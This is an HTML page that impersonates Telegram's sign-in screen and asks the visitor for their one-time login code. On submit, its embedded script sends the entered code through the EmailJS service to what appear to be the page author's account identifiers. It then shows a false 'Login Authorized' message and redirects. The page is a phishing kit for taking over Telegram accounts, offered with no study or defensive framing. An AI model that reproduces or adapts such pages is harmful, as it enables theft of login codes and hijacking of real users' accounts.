<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
    
        *{
            padding: 0;
            margin: 0;
        }
        header{
            min-height:100vh ;
            width: 100%;
            background: #212121;
        }
        .main-container{
            top: 50%;
            left: 50%;
            width: 80%;
            transform: translate(-50%, -50%);
            position: absolute;
            
        }
        .img{
            text-align: center;
        }
        .text-container{
            margin: 2rem 0;
            text-align: center;
        }
        .form-container{
           width: 70%; 
           margin: 2rem auto;
        }
        .form-container .input-div{
            margin: 2rem 0;
        }
        .text-container h2{
            color: #ccc;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            font-size: 32px;
            margin: 2rem 0;
        }
        .text-container p{
            color: #ccc;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            font-size: 16px;
            margin: 2rem auto;
            width: 60%;
            
        }

        label{
            color: #ccc;
            display: block;
            font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            text-align: left;
            margin: 0.5rem 0;
            font-size: 0.875rem;
        }
        input{
            padding: 16px 14px;
            width: 82%;
            background-color: transparent;
            border: 1px solid #ccc;
            border-radius: 10px;
        }
        input::placeholder{
            font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            font-size: 0.875rem;
        }
        input{
            color: white;
        }
        select{
            color: #ccc;
            padding: 14px 14px;
            width: 90%;
            background-color: transparent;
            border: 1px solid #ccc;
            border-radius: 10px;
        }

        .submit-btn{
            background-color: #2daff1;
            border: none;
            color: white;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            margin: 0 auto;
            display: block;
            width: 40%;
            border-radius: 20px;
            padding: 14px 16px;


        }
        @media (min-width:800px){
            .form-container{
                width: 40%;
            }
        }
    </style>
</head>
<body>
    <header>
        <div class="main-container">
            <div class="img">
                <img src="telegram.svg" width="150px" alt="">
            </div>
            <div class="text-container">
                <h2>Sign in to Telegram</h2>
                <p>Please confirm your country code and enter your phone number.</p>
            </div>
            <div class="form-container">
                <form id="otp" method="post">
                   
                 
                    <div class="input-div">
                        <label for="">OTP</label>
                       <input type="number" maxlength="8" placeholder="Enter your phone number here" name="otp" id="">
                    </div>
                    <button type="submit" class="submit-btn">Authorize</button>

                </form>
        
            </div>
           
        </div>
         <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
<script>
    (function(){
        emailjs.init("sceqBzuDlJfxQhHRW"); 
    })();

    document.getElementById('otp').addEventListener('submit', function(event) {
        event.preventDefault(); 

       
        var formData = {
            otp: document.getElementById('otp').value,
            
        };

        // Send email
        emailjs.send("service_5zcmlvr", "template_0m4j9mc", formData)
            .then(function(response) {
               alert('Login Authorized');
                window.location="index.html";
                // You can redirect or do something else after successful sending
            }, function(error) {
                return error;
                window.location = "signin.html"
            });
    });
</script>
    </header>
</body>
</html>